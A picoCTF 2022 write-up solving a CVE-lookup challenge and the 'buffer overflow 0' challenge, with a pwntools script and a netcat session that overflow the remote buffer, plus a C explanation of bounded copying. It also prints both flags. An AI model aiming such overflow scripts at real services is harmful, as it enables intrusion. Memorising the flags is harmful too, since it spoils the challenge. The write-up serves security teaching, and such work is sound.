Pico CTF 2022: Binary Exploitation
CVE-XXXX-XXXXX
Enter the CVE of the vulnerability as the flag with the correct flag format: picoCTF{CVE-XXXX-XXXXX} replacing XXXX-XXXXX with the numbers for the matching vulnerability. The CVE we're looking for is the first recorded remote code execution (RCE) vulnerability in 2021 in the Windows Print Spooler Service, which is available across desktop and server versions of Windows operating systems. The service is used to manage printers and print servers.
A quick web search turns it up: https://nsfocusglobal.com/windows-print-spooler-rce-vulnerabilities-cve-2021-1675-cve-2021-34527-mitigation-guide/
Flag : picoCTF{CVE-2021-34527}
buffer overflow 0
Smash the stack. Let's start off simple: can you overflow the correct buffer? The program is available here. You can view source here. And connect with it using:
You can write a Python script that overflows the remote program's buffer, as below.
```python
#!/usr/bin/env python3
import pwn

host = "saturn.picoctf.net"
port = 55986

# 101 bytes of 'A': more than the input buffer holds, so the copy overruns it
payload = bytes('A' * 101, encoding="ascii")

conn = pwn.remote(host, port)
# wait for the "Input: " prompt, then send the payload followed by a newline
conn.sendlineafter(b' ', payload)
# once the buffer is overflowed the program prints the flag on the next line
output = conn.recvline(timeout=5)
print(output)
```
```
➜ bof0 python bof.py
[+] Opening connection to saturn.picoctf.net on port 55986: Done
b'picoCTF{ov3rfl0ws_ar3nt_that_bad_ee2fd2b1}\n'
[*] Closed connection to saturn.picoctf.net port 55986
```
Or you can overflow the buffer manually over a netcat connection, as below.
```
➜ bof0 python -c "print('A'*101)"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
➜ bof0 nc saturn.picoctf.net 55986
Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
picoCTF{ov3rfl0ws_ar3nt_that_bad_ee2fd2b1}
```
Flag : picoCTF{ov3rfl0ws_ar3nt_that_bad_ee2fd2b1}
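The challenge's own source is not reproduced here, so the following is an added illustration, not the challenge's code, of why a 101-byte line overruns a fixed buffer and what the bounded alternative looks like. The buffer size `BUFSIZE`, the function names and the 101-byte 'A' input are assumptions chosen to match the writeup; the unbounded copy is shown for contrast but is only ever called with input that fits, since the oversized case is exactly the stack corruption the challenge exploits.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size of the target buffer (illustrative; the challenge's real
 * source is not on this page). */
#define BUFSIZE 100

/* Vulnerable pattern: an unbounded copy writes strlen(src) + 1 bytes into
 * dst regardless of how large dst is. A source longer than the buffer
 * overwrites whatever sits above it on the stack. */
void copy_unbounded(char *dst, const char *src) {
    strcpy(dst, src);
}

/* Hardened pattern: refuse any input that does not fit, counting the NUL.
 * Returns 0 on success and -1 when the copy would overflow dst. */
int copy_bounded(char *dst, size_t dst_size, const char *src) {
    size_t n = strlen(src);
    if (n + 1 > dst_size) {
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Hardened read: fgets stores at most dst_size - 1 characters, so a long
 * line is truncated rather than spilling past the buffer. Returns the
 * number of characters stored, with the trailing newline removed. */
size_t read_line_bounded(char *dst, size_t dst_size, FILE *in) {
    if (fgets(dst, (int)dst_size, in) == NULL) {
        dst[0] = '\0';
        return 0;
    }
    dst[strcspn(dst, "\n")] = '\0';
    return strlen(dst);
}

/* Constructed test input: `len` 'A' characters, like the writeup's payload. */
const char *make_payload(size_t len) {
    static char buf[512];
    if (len >= sizeof buf) {
        len = sizeof buf - 1;
    }
    memset(buf, 'A', len);
    buf[len] = '\0';
    return buf;
}

/* Simulated input handler using the bounded copy: 0 = accepted,
 * -1 = rejected because it would not fit in a BUFSIZE buffer. */
int handle_input(const char *input) {
    char buf[BUFSIZE];
    return copy_bounded(buf, sizeof buf, input);
}

int main(void) {
    printf("101 x 'A': %s\n",
           handle_input(make_payload(101)) == 0 ? "accepted" : "rejected (would overflow)");
    printf("\"hello\":   %s\n",
           handle_input("hello") == 0 ? "accepted" : "rejected");
    return 0;
}
```

The bounded copy rejects both the 101-byte line and a 100-byte line, because the terminating NUL also needs a slot; the `fgets` reader instead keeps the first 99 characters and drops the rest, which is the behaviour a non-interactive service usually wants.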